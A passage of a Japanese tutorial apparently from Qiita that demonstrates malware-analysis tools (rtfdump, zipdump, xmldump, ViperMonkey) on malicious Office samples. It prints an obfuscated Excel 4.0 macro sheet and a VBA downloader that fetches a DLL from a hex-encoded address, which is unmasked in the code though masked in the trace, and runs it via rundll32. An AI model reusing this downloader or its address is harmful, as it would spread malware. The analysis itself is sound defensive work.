00000290: 63 74 69 6F 6E 20 61 67  65 36 34 50 72 6F 63 6F  ction age64Proco
000002A0: 64 65 28 42 79 56 61 6C  20 63 76 77 74 72 35 79  de(ByVal cvwtr5y
000002B0: 63 62 76 65 2C 20 42 79  56 61 6C 20 74 72 74 73  cbve, ByVal trts
000002C0: 6B 34 38 34 74 33 37 38  29 0D 0A 20 20 20 20 44  k484t378)..    D
000002D0: 69 6D 20 78 74 65 78 65  6E 63 0D 0A 20 20 20 20  im xtexenc..

以下省略

また、「-d」を追加すると文字列だけ抽出できる。

cmd.exe
C:\Users\masaomi\Documents\DidierStevensSuite>rtfdump.py -s 3 -d sample.doc
\fcs1 \af31507 \ltrch\fcs0 \insrsid4932593
Microsoft Office does not work in email Preview.\line Please download the docume
nt and click {\b Enable Editing} when opening.

zipdump.py

ZIPファイルを解析してくれるツールだが、Officeファイルの解析にも使える。
オプションとかはoledump.pyに似ている。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py sample.xlsm
Index Filename                            Encrypted Timestamp
    1 [Content_Types].xml                         0 1980-01-01 00:00:00
    2 _rels/.rels                                 0 1980-01-01 00:00:00
    3 xl/workbook.xml                             0 1980-01-01 00:00:00
    4 xl/_rels/workbook.xml.rels                  0 1980-01-01 00:00:00
    5 xl/worksheets/sheet1.xml                    0 1980-01-01 00:00:00
    6 xl/worksheets/sheet2.xml                    0 1980-01-01 00:00:00
    7 xl/worksheets/sheet3.xml                    0 1980-01-01 00:00:00
    8 xl/worksheets/sheet4.xml                    0 1980-01-01 00:00:00
    9 xl/macrosheets/intlsheet1.xml               0 1980-01-01 00:00:00
   10 xl/theme/theme1.xml                         0 1980-01-01 00:00:00
   11 xl/styles.xml                               0 1980-01-01 00:00:00
   12 xl/sharedStrings.xml                        0 1980-01-01 00:00:00
   13 xl/drawings/drawing1.xml                    0 1980-01-01 00:00:00
   14 xl/media/image1.png                         0 1980-01-01 00:00:00
   15 xl/worksheets/_rels/sheet1.xml.rels         0 1980-01-01 00:00:00
   16 xl/drawings/_rels/drawing1.xml.rels         0 1980-01-01 00:00:00
   17 xl/calcChain.xml                            0 1980-01-01 00:00:00
   18 docProps/core.xml                           0 1980-01-01 00:00:00
   19 docProps/app.xml                            0 1980-01-01 00:00:00

「-d」を追加すると中身を見ることができる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
 xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://
schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://s
chemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2
xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/a
c" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xm
lns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns
:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr
6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{A
0124FFD-D8B1-4C57-9FC3-DE9478087DFA}"><dimension ref="G8"/><sheetViews><sheetVie
w showFormulas="1" workbookViewId="0"><selection activeCell="B4" sqref="B4"/></s
heetView></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25
"/><cols><col min="7" max="7" width="255.7109375" bestFit="1" customWidth="1"/><
/cols><sheetData><row r="8" spans="7:7" x14ac:dyDescent="0.25"><c r="G8" t="b"><
f>FORMULA(Cdfea!P22&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tg
bs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!
Q9&amp;Tgbfgs!J17&amp;Tgbs!F14&amp;Tgbfgs!S15&amp;Tgbfgs!F16,G13)=FORMULA(Cdfea!
P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR1"&amp;Tgbfgs!Q5&amp;Cdfe
a!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!
F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!G
16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G15)=FORMULA(Cdfea!P22&amp;Cdfea!
J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR2"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea
!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I
10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!H14&amp;Tgbfgs!
S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G17)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!
B18&amp;Cdfea!P11&amp;"NEVR3"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!
B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H
4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!I16&amp;Tgbfgs!S15&amp;Tgbfgs
!F16&amp;Cdfea!P13,G19)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!
P11&amp;"NEVR4"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!
B15&amp;Tgbs!D7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2
&amp;Tgbs!Q9&amp;Tgbfgs!J17&amp;Tgbs!J14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea
!P13,G21)=FORMULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR5
"&amp;Tgbfgs!Q5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D
7&amp;Tgbs!F3&amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&a
mp;Tgbfgs!J17&amp;Tgbs!K16&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G23)=FORM
ULA(Cdfea!P22&amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR6"&amp;Tgbfgs!Q
5&amp;Cdfea!H9&amp;Cdfea!L2&amp;Cdfea!B15&amp;Cdfea!B15&amp;Tgbs!D7&amp;Tgbs!F3&
amp;Cdfea!F10&amp;Tgbs!I10&amp;Cdfea!H4&amp;Cdfea!L2&amp;Tgbs!Q9&amp;Tgbfgs!J17&
amp;Tgbs!L14&amp;Tgbfgs!S15&amp;Tgbfgs!F16&amp;Cdfea!P13,G25)=FORMULA(Cdfea!P22&
amp;Cdfea!J11&amp;Cdfea!B18&amp;Cdfea!P11&amp;"NEVR7"&amp;Tgbfgs!Q5&amp;Cdfea!H9
&amp;Cdfea!B15&amp;Cdfea!I17&amp;Cdfea!I3&amp;Cdfea!H13&amp;Cdfea!P11&amp;Cdfea!
K9&amp;Cdfea!P13&amp;Cdfea!P7&amp;Cdfea!P13,G27)=FORMULA(Cdfea!P22&amp;Cdfea!H13
&amp;Cdfea!N4&amp;Cdfea!H13&amp;Cdfea!H9&amp;Cdfea!P11&amp;Cdfea!P15&amp;Cdfea!H
9&amp;Cdfea!P20&amp;Tgbfgs!M12&amp;Tgbfgs!N8&amp;Tgbfgs!I4&amp;Tgbs!R21&amp;Tgbf
gs!G10&amp;Cdfea!P15&amp;Cdfea!P13,G29)=FORMULA(Cdfea!P22&amp;Cdfea!G24&amp;Cdfe
a!H13&amp;Cdfea!E6&amp;Cdfea!E11&amp;Cdfea!G24&amp;Cdfea!K23&amp;Cdfea!P11&amp;C
dfea!P13,G34)</f><v>1</v></c></row></sheetData><pageMargins left="0.7" right="0.
7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/></xm:macrosheet>

「-t utf8 or utf16」を追加するとデコードすることができる。

xmldump.py

Officeファイルに含まれている、XMLファイルを解析してくれる。
「text」でXML内の要素から全ての文字列を抽出してくれる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py text
FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F1
0&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G
13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&C
dfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2
&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!
P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&
Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J1
7&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfe
a!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&
Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!
S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"N
EVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&
Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdf
ea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cd
fea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&
Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMUL
A(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cd
fea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&T
gbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!
J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&
Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22
&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tg
bfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMUL
A(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11
&Cdfea!P13,G34)1

「wordtext」にすると、w:p要素の文字列を表示してくれる。
「elementtext」にすると、XMLファイルからすべての要素をその文字列とともに表示してくれる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py elementtext
xm:macrosheet: FORMULA(Cdfea!P22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&T
gbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S
15&Tgbfgs!F16,G13)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfg
s!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cd
fea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)
=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfe
a!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tg
bs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22
&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdf
ea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&T
gbs!I16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B
18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgb
s!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15
&Tgbfgs!F16&Cdfea!P13,G21)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR
5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgb
s!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!
P13,G23)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea
!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdf
ea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(C
dfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfe
a!I17&Cdfea!I3&Cdfea!H13&Cdfea!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FO
RMULA(Cdfea!P22&Cdfea!H13&Cdfea!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!
H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!
P13,G29)=FORMULA(Cdfea!P22&Cdfea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfe
a!K23&Cdfea!P11&Cdfea!P13,G34)1
dimension:
sheetViews:
sheetView:
selection:
sheetFormatPr:
cols:
col:

以下省略

「-u」を追加すると、URL文字列を抽出してくれる。

cmd.exe
C:\Users\masaomi\Downloads\DidierStevensSuite>zipdump.py -s 9 -d sample.xlsm | x
mldump.py -u elementtext
{http://schemas.microsoft.com/office/excel/2006/main}macrosheet: FORMULA(Cdfea!P
22&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfe
a!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!F14&Tgbfgs!S15&Tgbfgs!F16,G13)=FORMULA(Cdf
ea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR1"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B
15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs
!J17&Tgbs!G16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G15)=FORMULA(Cdfea!P22&Cdfea!J11&C
dfea!B18&Cdfea!P11&"NEVR2"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!
D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!H14&Tgbf
gs!S15&Tgbfgs!F16&Cdfea!P13,G17)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11
&"NEVR3"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F
10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!I16&Tgbfgs!S15&Tgbfgs!F16&
Cdfea!P13,G19)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR4"&Tgbfgs!Q5
&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!
H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!J14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G21)=FOR
MULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&Cdfea!P11&"NEVR5"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2
&Cdfea!B15&Cdfea!B15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q
9&Tgbfgs!J17&Tgbs!K16&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G23)=FORMULA(Cdfea!P22&Cdf
ea!J11&Cdfea!B18&Cdfea!P11&"NEVR6"&Tgbfgs!Q5&Cdfea!H9&Cdfea!L2&Cdfea!B15&Cdfea!B
15&Tgbs!D7&Tgbs!F3&Cdfea!F10&Tgbs!I10&Cdfea!H4&Cdfea!L2&Tgbs!Q9&Tgbfgs!J17&Tgbs!
L14&Tgbfgs!S15&Tgbfgs!F16&Cdfea!P13,G25)=FORMULA(Cdfea!P22&Cdfea!J11&Cdfea!B18&C
dfea!P11&"NEVR7"&Tgbfgs!Q5&Cdfea!H9&Cdfea!B15&Cdfea!I17&Cdfea!I3&Cdfea!H13&Cdfea
!P11&Cdfea!K9&Cdfea!P13&Cdfea!P7&Cdfea!P13,G27)=FORMULA(Cdfea!P22&Cdfea!H13&Cdfe
a!N4&Cdfea!H13&Cdfea!H9&Cdfea!P11&Cdfea!P15&Cdfea!H9&Cdfea!P20&Tgbfgs!M12&Tgbfgs
!N8&Tgbfgs!I4&Tgbs!R21&Tgbfgs!G10&Cdfea!P15&Cdfea!P13,G29)=FORMULA(Cdfea!P22&Cdf
ea!G24&Cdfea!H13&Cdfea!E6&Cdfea!E11&Cdfea!G24&Cdfea!K23&Cdfea!P11&Cdfea!P13,G34)
1

以下省略

ViperMonkey

悪意あるVBAマクロを動的解析してくれるツール。
Docker上で使うことができ、下記のコマンドを実行するだけで解析が始まる。
その時に検体はコンテナの中にコピーされて、そこで解析される。

$ docker/dockermonkey.sh sample.xls
 _    ___                 __  ___            __
| |  / (_)___  ___  _____/  |/  /___  ____  / /_____  __  __
| | / / / __ \/ _ \/ ___/ /|_/ / __ \/ __ \/ //_/ _ \/ / / /
| |/ / / /_/ /  __/ /  / /  / / /_/ / / / / ,< /  __/ /_/ /
|___/_/ .___/\___/_/  /_/  /_/\____/_/ /_/_/|_|\___/\__, /
     /_/                                           /____/
vmonkey 1.0.2 - https://github.com/decalage2/ViperMonkey
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/ViperMonkey/issues

===============================================================================
FILE: /root/sample.xls
-------------------------------------------------------------------------------
VBA MACRO ЭтаКнига.cls
in file:  - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u042d\u0442\u0430\u041a\u043d\u0438\u0433\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):

Sub Workbook_Open()
Dim euvjhxge As Object
Dim tnukmirrugnryiyq As Object
Dim tdcivbfshcvnxzndtlc As String
Dim frwygfpnfwpcuyrbrni As String
tdcivbfshcvnxzndtlc = fmlnjifrotgwtih("687474703a2f2f36362e3135302e36362e3136372f73752e") & fmlnjifrotgwtih("646c6c")
frwygfpnfwpcuyrbrni = fmlnjifrotgwtih("433a5c5769") & fmlnjifrotgwtih("6e646f77735c5461736b735c73752e646c6c")
Set euvjhxge = CreateObject(fmlnjifrotgwtih("4d6963") & fmlnjifrotgwtih("726f736f66742e584d4c48545450"))
euvjhxge.Open fmlnjifrotgwtih("474554"), tdcivbfshcvnxzndtlc, False
euvjhxge.send
If euvjhxge.Status = 200 Then
Set tnukmirrugnryiyq = CreateObject(fmlnjifrotgwtih("41444f44422e") & fmlnjifrotgwtih("53747265616d"))
tnukmirrugnryiyq.Open
tnukmirrugnryiyq.Type = 1
tnukmirrugnryiyq.Write euvjhxge.responseBody
tnukmirrugnryiyq.SaveToFile frwygfpnfwpcuyrbrni, 2
tnukmirrugnryiyq.Close
End If
Dim ExecFile As Double
ExecFile = Shell(fmlnjifrotgwtih("72756e646c6c333220433a5c57696e646f77735c5461736b735c7375") & fmlnjifrotgwtih("2e646c6c2c20506c7567696e496e6974"))
End Sub





-------------------------------------------------------------------------------
PARSING VBA CODE:
-------------------------------------------------------------------------------
VBA MACRO Лист1.cls
in file:  - OLE stream: u'_VBA_PROJECT_CUR/VBA/\u041b\u0438\u0441\u04421'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO hdxlonvwk.bas
in file:  - OLE stream: u'_VBA_PROJECT_CUR/VBA/hdxlonvwk'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-------------------------------------------------------------------------------
VBA CODE (with long lines collapsed):

Function fmlnjifrotgwtih(ByVal erhzhqcay As String) As String
Dim pctzqqipfx As Long
For pctzqqipfx = 1 To Len(erhzhqcay) Step 2
fmlnjifrotgwtih = fmlnjifrotgwtih & Chr$(Val("&H" & Mid$(erhzhqcay, pctzqqipfx, 2)))
Next pctzqqipfx
End Function





-------------------------------------------------------------------------------
PARSING VBA CODE:

-------------------------------------------------------------------------------
TRACING VBA CODE (entrypoint = Auto*):

Recorded Actions:
+----------------------+-----------------------------------------------+---------------------------------+
| Action               | Parameters                                    | Description                     |
+----------------------+-----------------------------------------------+---------------------------------+
| Start Regular        |                                               | All wildcard matches will match |
| Emulation            |                                               |                                 |
| Found Entry Point    | workbook_open                                 |                                 |
| CreateObject         | ['Microsoft.XMLHTTP']                         | Interesting Function Call       |
| euvjhxge.Open        | ['GET', 'hxxp://○○○/su.dll', False] | Interesting Function Call       |
| Object.Method Call   | ['GET', 'hxxp://○○○/su.dll', False] | euvjhxge.Open                   |
| GET                  | hxxp://○○○/su.dll                   | Interesting Function Call       |
| CreateObject         | ['ADODB.Stream']                              | Interesting Function Call       |
| tnukmirrugnryiyq.Ope |                                               | Interesting Function Call       |
| n                    |                                               |                                 |
| Object.Method Call   | ['C:\\Windows\\Tasks\\su.dll', 2]             | tnukmirrugnryiyq.SaveToFile     |
| Write File           | C:\Windows\Tasks\su.dll                       | SaveToFile                      |
| Dropped File Hash    | 21eac00ec11c89e381668f3e36bb1b24e98f79a41c44f | File Name: ADODB.Stream         |
|                      | 49b2b7689aa5bb222f1                           |                                 |
| Execute Command      | rundll32 C:\Windows\Tasks\su.dll, PluginInit  | Shell function                  |
+----------------------+-----------------------------------------------+---------------------------------+

Intermediate IOCs:

+---------------------------------------------------------+
hxxp://○○○/su.dll
+---------------------------------------------------------+

VBA Builtins Called: ['Chr', 'CreateObject', 'Len', 'Mid', 'Shell', 'Val']

Decoded Strings (11):
  hxxp://○○○/su.
  dll
  C:\Wi
  ndows\Tasks\su.dll
  Mic
  rosoft.XMLHTTP
  GET
  ADODB.
  Stream
  rundll32 C:\Windows\Tasks\su
  .dll, PluginInit

Finished analyzing /root/sample.xls .

  adding: root/sample.xls_artifacts/ (stored 0%)
  adding: root/sample.xls_artifacts/ADODB.Stream (stored 0%)
[*] Dropped files are in sample.xls_artifacts.zip
[*] Done - Killing docker container c89da96207dbfe2f16469e979ca63ac3bc4a0efac4704526e89b2613570fd817

※URLの一部を置き換えています。

実行したコマンドやプロセス・レジストリの挙動、通信先などが書かれたレポートが出力されている。

14
20
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
14
20

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?